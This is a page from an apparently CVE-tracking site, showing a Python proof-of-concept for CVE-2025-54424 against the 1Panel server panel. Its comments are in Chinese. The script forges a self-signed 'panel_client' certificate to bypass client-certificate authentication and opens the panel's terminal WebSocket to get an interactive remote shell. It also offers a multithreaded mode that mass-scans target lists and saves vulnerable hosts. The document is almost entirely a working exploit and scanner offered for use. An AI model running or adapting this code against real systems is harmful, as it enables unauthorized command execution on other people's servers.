4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-54424.py PY
import base64
import ssl
import sys
import json
import os
import tempfile
import argparse
import requests
import websocket
import threading
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urlparse
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
import datetime

# 禁用 requests 库在禁用SSL验证时产生的警告
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# --- 全局变量和线程锁 ---
print_lock = threading.Lock()
exploit_running = True
vulnerable_hosts = []

# --- 核心功能函数 ---

def generate_self_signed_cert():
    """动态生成CN为'panel_client'的证书和私钥,并返回临时文件路径。"""
    with print_lock:
        print("[*] 正在动态生成伪造的客户端证书...")
    try:
        private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
        subject = issuer = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"panel_client")])
        cert_builder = x509.CertificateBuilder().subject_name(subject).issuer_name(issuer).public_key(
            private_key.public_key()
        ).serial_number(x509.random_serial_number()).not_valid_before(
            datetime.datetime.utcnow()
        ).not_valid_after(
            datetime.datetime.utcnow() + datetime.timedelta(days=365)
        )
        cert = cert_builder.sign(private_key, hashes.SHA256())
        
        key_file = tempfile.NamedTemporaryFile(delete=False, mode='wb', suffix=".key")
        key_file.write(private_key.private_bytes(
            encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.PKCS8,
            encryption_algorithm=serialization.NoEncryption(),
        ))
        key_file.close()
        
        cert_file = tempfile.NamedTemporaryFile(delete=False, mode='wb', suffix=".crt")
        cert_file.write(cert.public_bytes(serialization.Encoding.PEM))
        cert_file.close()
        
        with print_lock:
            print(f"[+] 证书已生成: {cert_file.name}, {key_file.name}")
        return cert_file.name, key_file.name
    except Exception as e:
        with print_lock:
            print(f"[ERROR] 生成证书时发生错误: {e}")
        return None, None

def check_target(target_host, cert_path, key_path, proxy_dict, proxy_opts):
    """对单个目标执行完整的两步检测流程。返回 (target_host, bool, str)"""
    # 步骤一:HTTP 预检
    check_url = f"https://{target_host}/api/v2/dashboard/base/os"
    headers = {
        'User-Agent': '1panel_client',
        'Origin':f"https://{target_host}/",
        'Content-Type': 'application/ison'
    }
    try:
        response = requests.get(
            check_url, cert=(cert_path, key_path), proxies=proxy_dict, verify=False, timeout=10, headers=headers
        )
        if response.status_code != 200:
            return target_host, False, f"预检失败 (HTTP {response.status_code})"
        with print_lock:
            print(f"[*] {target_host:<21} - HTTP 预检成功 (200 OK)")
    except requests.exceptions.RequestException as e:
        return target_host, False, f"预检请求失败 ({type(e).__name__})"

    # 步骤二:WebSocket 连接尝试
    ws_url = f"wss://{target_host}/api/v2/hosts/terminal"
    try:
        ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ssl_context.load_cert_chain(cert_path, key_path)
        ssl_context.check_hostname = False
        ssl_context.verify_mode = ssl.CERT_NONE
        ws = websocket.create_connection(ws_url, sslopt={"context": ssl_context}, timeout=10, **proxy_opts)
        ws.close()
        return target_host, True, "存在漏洞 (HTTP预检和WSS连接均成功)"
    except Exception as e:
        return target_host, False, f"WSS连接失败 ({type(e).__name__})"

def receive_thread(ws):
    """交互式Shell的接收线程。"""
    global exploit_running
    while exploit_running:
        try:
            raw_message = ws.recv()
            if not raw_message: continue
            response_json = json.loads(raw_message)
            if isinstance(response_json, dict) and "data" in response_json and response_json["data"]:
                decoded_bytes = base64.b64decode(response_json["data"])
                output_str = decoded_bytes.decode('utf-8', errors='ignore')
                sys.stdout.write(output_str)
                sys.stdout.flush()
        except (websocket.WebSocketConnectionClosedException, ConnectionResetError):
            if exploit_running: print("\n[*] 连接意外关闭。"); exploit_running = False
            break
        except Exception: pass

def run_exploit_mode(target, cert_path, key_path, proxy_opts):
    """执行单目标利用。"""
    global exploit_running
    print("[*] 正在尝试获取交互式 Shell...")
    ws_url = f"wss://{target}/api/v2/hosts/terminal"
    try:
        ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ssl_context.load_cert_chain(cert_path, key_path)
        ssl_context.check_hostname = False
        ssl_context.verify_mode = ssl.CERT_NONE
        ws = websocket.create_connection(ws_url, sslopt={"context": ssl_context}, **proxy_opts)
        print("[+] Shell 获取成功!")
        print("[*] 输入 'exit' 或按下 Ctrl+C 退出。")
        print("---")

        recv_th = threading.Thread(target=receive_thread, args=(ws,))
        recv_th.daemon = True
        recv_th.start()
        
        while exploit_running:
            try:
                cmd = input()
                if cmd.strip().lower() == 'exit': break
                b64_cmd = base64.b64encode((cmd + '\n').encode('utf-8')).decode('utf-8')
                ws.send(json.dumps({"type": "cmd", "data": b64_cmd}))
            except EOFError: break
        
        exploit_running = False
        ws.close()
    except KeyboardInterrupt:
        print("\n[*] 用户中断,正在关闭 Shell...")
    except Exception as e:
        print(f"\n[-] 获取 Shell 时发生错误: {e}")
    finally:
        exploit_running = False

def run_scan_mode(targets, cert_path, key_path, proxy_dict, proxy_opts, threads, output_file):
    """执行批量扫描。"""
    print(f"[*] 开始对 {len(targets)} 个目标进行检测,使用 {threads} 个线程...")
    with ThreadPoolExecutor(max_workers=threads) as executor:
        future_to_target = {executor.submit(check_target, t, cert_path, key_path, proxy_dict, proxy_opts): t for t in targets}
        for future in as_completed(future_to_target):
            target, is_vulnerable, message = future.result()
            with print_lock:
                if is_vulnerable:
                    print(f"[+] {target:<21} - {message}")
                    vulnerable_hosts.append(target)
                else:
                    print(f"[-] {target:<21} - {message}")
    
    if vulnerable_hosts:
        print(f"\n[*] 检测完成!发现 {len(vulnerable_hosts)} 个存在漏洞的目标。")
        with open(output_file, 'w') as f:
            for host in vulnerable_hosts:
                f.write(host + '\n')
        print(f"[+] 结果已保存到文件: {output_file}")
    else:
        print("\n[*] 检测完成,未发现存在漏洞的目标。")

def main():
    parser = argparse.ArgumentParser(description="1Panel 客户端证书绕过RCE漏洞 一体化工具 (扫描+利用)\n作者: Mrxn https://github.com/Mr-xn", formatter_class=argparse.RawTextHelpFormatter)
    mode = parser.add_mutually_exclusive_group(required=True)
    mode.add_argument("-u", "--url", help="单个目标,进入利用模式。例如: 192.168.1.100:8080")
    mode.add_argument("-f", "--file", help="目标文件,进入批量扫描模式。")
    
    parser.add_argument("-o", "--output", default="vulnerable_targets.txt", help="[扫描模式] 保存漏洞结果的文件名。")
    parser.add_argument("-t", "--threads", type=int, default=20, help="[扫描模式] 并发线程数。")
    parser.add_argument("--proxy", help="为所有请求设置代理。例如: http://127.0.0.1:8080")
    args = parser.parse_args()

    cert_path, key_path = generate_self_signed_cert()
    if not cert_path: sys.exit(1)

    proxy_dict = {"http": args.proxy, "https": args.proxy} if args.proxy else {}
    proxy_opts = {}
    if args.proxy:
        print(f"[*] 所有请求将通过代理: {args.proxy}")
        p = urlparse(args.proxy)
        proxy_opts = {"proxy_type": p.scheme, "http_proxy_host": p.hostname, "http_proxy_port": p.port, "http_proxy_auth": (p.username, p.password) if p.username else None}

    try:
        if args.url:
            # --- 利用模式 ---
            print(f"---[ 进入单点利用模式: {args.url} ]---")
            target, is_vulnerable, message = check_target(args.url, cert_path, key_path, proxy_dict, proxy_opts)
            if is_vulnerable:
                print(f"[+] 目标 {args.url} 确认存在漏洞!")
                run_exploit_mode(args.url, cert_path, key_path, proxy_opts)
            else:
                print(f"[-] 目标 {args.url} 不存在漏洞或无法访问: {message}")
        
        elif args.file:
            # --- 扫描模式 ---
            print(f"---[ 进入批量扫描模式: {args.file} ]---")
            if not os.path.exists(args.file):
                print(f"[ERROR] 目标文件不存在: {args.file}"); return
            with open(args.file, 'r') as f:
                targets = [line.strip() for line in f if line.strip()]
            if not targets:
                print("[ERROR] 目标文件为空。"); return
            run_scan_mode(targets, cert_path, key_path, proxy_dict, proxy_opts, args.threads, args.output)

    except KeyboardInterrupt:
        print("\n[*] 用户中断,正在退出...")
    finally:
        if cert_path and os.path.exists(cert_path): os.remove(cert_path)
        if key_path and os.path.exists(key_path): os.remove(key_path)
        print("[*] 临时证书已清理,程序退出。")

if __name__ == "__main__":
    main()